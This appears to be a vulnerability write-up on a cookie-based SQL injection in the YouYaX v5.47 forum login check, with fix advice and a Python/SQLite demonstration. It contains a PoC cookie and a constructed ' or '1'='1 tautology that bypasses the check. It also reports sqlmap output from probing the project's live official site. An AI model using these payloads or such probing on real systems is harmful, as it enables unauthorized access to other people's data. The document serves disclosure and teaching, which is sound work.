YouYaX_V5.47 SQL Injection Vulnerability
The problem is in the file ORG/YouYa.php, line 3:
    public function find($table, $ext = "string", $param) {
        // If $param contains an '=', it is used verbatim as the WHERE clause;
        // otherwise it is treated as an id value. Nothing is escaped in either case.
        if (preg_match_all("/=/", $param, $tmp)) {
            $SQL = "select * from " . $table . " where " . $param;
            // echo 'x ' . $SQL;
        } else {
            $param = "id = $param";
            $SQL = "select * from " . $table . " where " . $param;
            // echo 'y ' . $SQL;
        }
        $result = mysql_query($SQL);
        $num = mysql_num_rows($result);
        if ($num <= 0) {
            return false;
        } else {
            $arr = mysql_fetch_array($result);
            // mysql_fetch_array returns both numeric and string keys;
            // $ext selects which set of keys to keep.
            switch ($ext) {
                case "number":
                    foreach ($arr as $k => $v) {
                        if (is_string($k)) {
                            unset($arr[$k]);
                        }
                    }
                    break;
                case "string":
                    foreach ($arr as $k => $v) {
                        if (is_numeric($k)) {
                            unset($arr[$k]);
                        }
                    }
                    break;
            }
            return $arr;
        }
    }
Here the $param argument is concatenated into the query without any filtering, so any caller that builds it from user input introduces a SQL injection. Looking for callers of the function: Lib/ListAction.php calls it in the index method with the following lines:
    if (isset($_COOKIE['youyax_data']) && isset($_COOKIE['youyax_user']) && isset($_COOKIE['youyax_bz'])) {
        //echo $_COOKIE['youyax_user'];
        // Both cookie values go straight into the WHERE clause. Note that
        // youyax_cookieid is used without an isset() check of its own.
        if ($this->find(C('db_prefix') . "user", 'string', "user='" . $_COOKIE['youyax_user'] . "' and cookieid='" . $_COOKIE['youyax_cookieid'] . "'")) {
            $_SESSION['youyax_data'] = $_COOKIE['youyax_data'];
            $_SESSION['youyax_user'] = $_COOKIE['youyax_user'];
            $_SESSION['youyax_bz'] = $_COOKIE['youyax_bz'];
        }
    }
Here find() builds the SQL query from youyax_user and youyax_cookieid taken straight from the cookie, and both values are under the user's control; the cookieid value in particular is injectable. Note also that whenever find() returns a row, the code copies the cookie values into $_SESSION, so this unescaped query is the only thing standing between an arbitrary cookie and a cookie-based login.
PoC cookie:
    PHPSESSID=Taobao; youyax_data=1; youyax_user=qwerty; youyax_bz=1; youyax_cookieid=comment'
Using the official site http://bbs.youyax.com/ as an example, this produces a SQL error. Database information of the official site (sqlmap output):
    web application technology: Apache 2, PHP 5.3.27
    back-end DBMS: MySQL 5.0.11
    available databases [2]:
    [*] information_schema
    [*] youyaxco_youyax
It was too slow to keep running, so I stopped here...
Solution: escape the values before they reach find(); the vendor's fix filters the $param parameter with addslashes. Two caveats for anyone applying that fix: addslashes must be applied to the individual cookie values at the call site, not to the assembled WHERE clause inside find(), since escaping the whole clause also escapes the legitimate quotes around user='...' and breaks the query; and addslashes knows nothing about the connection character set, so mysql_real_escape_string on the open connection is the safer escaping call. The robust fix is to stop passing a caller-built WHERE clause at all and bind the user and cookieid values as parameters of a prepared statement.
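The following is an added worked example, not code from the YouYaX project or from the original write-up. It reproduces the query construction of ListAction::index and YouYa::find in Python against an in-memory SQLite table (a stand-in for the MySQL youyax_user table; the sample rows are constructed, and the column set is an assumption), runs the page's PoC cookie value through it, shows that the attacker controls the WHERE clause, contrasts it with a parameterized query, and illustrates why addslashes applied to the whole clause would break the legitimate query. The tautology payload in the demo is constructed here to show the consequence of the bug and is not from the original post.

```python
import sqlite3

# Constructed sample data standing in for the youyax_user table.
# Assumption: the real table has more columns; only user and cookieid matter here.
SAMPLE_USERS = [
    ("admin", "c0ffee"),
    ("qwerty", "deadbeef"),
]


def make_db():
    """In-memory SQLite stand-in for the MySQL database the write-up targets."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "create table youyax_user (id integer primary key, user text, cookieid text)"
    )
    conn.executemany(
        "insert into youyax_user (user, cookieid) values (?, ?)", SAMPLE_USERS
    )
    return conn


def vulnerable_find_sql(table, user, cookieid):
    """Builds the query exactly the way ListAction::index plus YouYa::find do:
    the cookie values are concatenated into the WHERE clause unescaped."""
    param = "user='" + user + "' and cookieid='" + cookieid + "'"
    return "select * from " + table + " where " + param


def vulnerable_find(conn, user, cookieid):
    """Returns the first matching row or None (find() returns false on no rows).
    Raises sqlite3.OperationalError when injected input breaks the SQL syntax."""
    return conn.execute(vulnerable_find_sql("youyax_user", user, cookieid)).fetchone()


def run_vulnerable(conn, user, cookieid):
    """Runs the vulnerable query and tags the outcome, so both the
    syntax-error case (the page's PoC) and the row-returned case are visible."""
    try:
        row = vulnerable_find(conn, user, cookieid)
    except sqlite3.OperationalError as exc:
        return ("sql error", str(exc))
    return ("row", row)


def safe_find(conn, user, cookieid):
    """Hardened version: the values are bound parameters, so quotes inside
    them are data, never SQL syntax. This is the fix to prefer over addslashes."""
    sql = "select * from youyax_user where user=? and cookieid=?"
    return conn.execute(sql, (user, cookieid)).fetchone()


def php_addslashes(s):
    """Port of PHP addslashes(): backslash before ' " \\ and NUL.
    Used only to show what escaping the assembled clause would do."""
    out = []
    for ch in s:
        if ch in "'\"\\":
            out.append("\\" + ch)
        elif ch == "\x00":
            out.append("\\0")
        else:
            out.append(ch)
    return "".join(out)


if __name__ == "__main__":
    conn = make_db()
    # Legitimate cookie: one row comes back and the session would be populated.
    print(run_vulnerable(conn, "qwerty", "deadbeef"))
    # The page's PoC: a trailing quote leaves the string literal unterminated.
    print(vulnerable_find_sql("youyax_user", "qwerty", "comment'"))
    print(run_vulnerable(conn, "qwerty", "comment'"))
    # Constructed tautology: the WHERE clause now matches every row, so a
    # row is returned without knowing any cookieid (AND binds tighter than OR).
    print(run_vulnerable(conn, "qwerty", "' or '1'='1"))
    # Parameterized query: the same payload is just a string that matches nothing.
    print(safe_find(conn, "qwerty", "' or '1'='1"))
    # addslashes on the whole clause escapes the legitimate quotes too.
    print(php_addslashes("user='qwerty' and cookieid='deadbeef'"))
```

Running the script shows the PoC value turning into `cookieid='comment''`, which SQLite (like MySQL) rejects as an unterminated string, matching the SQL error reported on the official site; the tautology case returns the first row of the table, which is exactly the condition under which the PHP code would copy the attacker's cookie values into $_SESSION.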